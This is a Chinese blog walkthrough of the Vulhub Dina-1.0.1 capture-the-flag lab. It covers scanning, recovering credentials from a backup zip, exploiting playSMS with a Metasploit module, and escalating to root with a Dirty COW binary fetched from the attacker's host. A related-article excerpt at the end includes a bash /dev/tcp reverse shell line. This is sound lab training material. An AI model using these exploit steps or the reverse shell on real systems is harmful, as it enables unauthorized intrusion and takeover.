Vulhub靶场之Dina-1.0.1

2023-11-10 08:11
文章标签 靶场 1.0 vulhub dina

本文主要是介绍Vulhub靶场之Dina-1.0.1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Vulhub靶场之Dina-1.0.1

靶机描述

ctf类的靶机,目标是获取/root/flag.txt

环境准备

vmware15 打开
攻击机:kali   NAT模式 10.10.10.128
靶机:Dina1.0.1		NAT模式  10.10.10.144

解题过程

1、nmap扫描获取存活主机
nmap -sP 10.10.10.0/24
靶机IP:10.10.10.144
2、nmap扫描获取靶机信息
nmap -sV -O 10.10.10.144
开放了80端口、linux内核版本在2.6.32-3.5
开放了80端口
3、按照惯例,查看robots.txt
在这里插入图片描述
4、对robots里的内容逐一查看并查看源码,发现nothing源码内有类似密码的东西
在这里插入图片描述
在这里插入图片描述

5、打开web,使用dirsearch对该web后台进行扫描
python3 dirsearch.py -u http://10.10.10.144


在这里插入图片描述
6、分别查看http://10.10.10.144/uploads/、http://10.10.10.144/tmp/、http://10.10.10.144/secure,发现secure中有backup.zip压缩包
在这里插入图片描述
7、将其下载下来,发现里面是一个mp3格式的文件,解压需要密码
在这里插入图片描述
8、使用nothing中获取到的源码逐一尝试(freedom为正确密码),解压完后发现,以mp3格式打开报错,于是尝试010editor打开,发现一串内容。
在这里插入图片描述
提示三个信息:
(1)密码是简单密码,与creds backup file有关
(2)用户名是touhid
(3)一段URL:/SecreTSMSgatwayLogin

9、打开该URL,是一个playsms类型的网站的登录界面,尝试使用用户名touhid,密码是nothing源码提示的密码(密码为diana),登陆成功
在这里插入图片描述
10、寻找文件上传点等漏洞,尝试能否传马。
在这里插入图片描述
11、或者直接msf利用playsms的相关攻击模块,并设置相关参数

search playsms
use exploit/multi/http/playsms_filename_exec   
show options
set rhosts 10.10.10.144
set targeturi /SecreTSMSgatwayLogin
set username touhid
set password diana
set lhost 10.10.10.128

在这里插入图片描述
12、执行成功后,获得meterpreter通道,进入shell,需要设置虚拟终端

python -c "import pty;pty.spawn('/bin/bash');"  #linux系统的终端(信息收集时知道靶机是linux系统)

在这里插入图片描述
13、此时,获得的是普通的web账户的权限,需要进行提权。
这里因为前期信息收集已知linux内核版本是2.6-3.5的,因此尝试脏牛提权。

wget http://10.10.10.128/dirty.c  #开启kali的apache服务,通过wget的方式下载脏牛源文件
service apache2 start #开启kali apache,将源文件放到网站根目录下

14、发现当前目录下没有权限读写下载文件,于是在其他目录上下载,比如tmp目录
在这里插入图片描述
在这里插入图片描述
15、编译该文件,并执行

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述在这里插入图片描述
16、切换成管理员用户firefart,并获取flag.txt文件
在这里插入图片描述
在这里插入图片描述

这篇关于Vulhub靶场之Dina-1.0.1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381428

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

概率DP (由一道绿题引起的若干问题。目前为一些老题,蒟蒻的尝试学习1.0)

概率DP: 利用动态规划去解决 概率 期望 的题目。 概率DP 求概率(采用顺推) 从 初始状态推向结果,同一般的DP类似,只是经历了概率论知识的包装。 老题: 添加链接描述 题意: 袋子里有w只白鼠,b只黑鼠,A和B轮流从袋子里抓,谁先抓到白色谁就赢。A每次随机抓一只,B每次随机 抓完一只后 会有另外一只随机老鼠跑出来。如果两个人都没有抓到白色,那么B赢。A先抓,问A赢得概率。 w b 均在

vulhub GhostScript 沙箱绕过(CVE-2018-16509)

1.执行以下命令启动靶场环境并在浏览器访问 cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录   docker-compose up -d #启动靶场   docker ps #查看容器信息 2.访问网页 3.下载包含payload的png文件 vulhub/ghostscript/CVE-2018-16509/poc.png at

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

2-rec 1.启动环境  cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下docker-compose up -d # docker-compose启动靶场docker ps -a # 查看开启的靶场信息 2.访问192.168.146.136:8080网页 3.构造payload http

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

从 Hadoop 1.0 到 Hadoop 2.0 ,你需要了解这些

学习大数据,刚开始接触的是 Hadoop 1.0,然后过度到 Hadoop 2.0 ,这里为了书写方便,本文中 Hadoop 1.0 采用 HV1 的缩写方式,Hadoop 2.0 采用 HV2 的缩写方式。 HV1 中不得不提的两个进程:JobTracker 和 TaskTracker。JobTracker 主要负责任务调度和集群资源管理,TaskTracker 主要负责任务执行。在 HV1

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

【C-实践】文件服务器(1.0)

概述 使用了 tcp + epoll + 进程池,实现文件下载服务器 功能 主要功能:客户端连接服务器,然后自动下载文件 次要功能:客户端接收时显示进度条 启动 启动服务器 1、在bin目录下生成可执行文件 w@Ubuntu20:bin $ gcc ../src/*.c -o server 2、启动服务器 w@Ubuntu20:bin $ ./server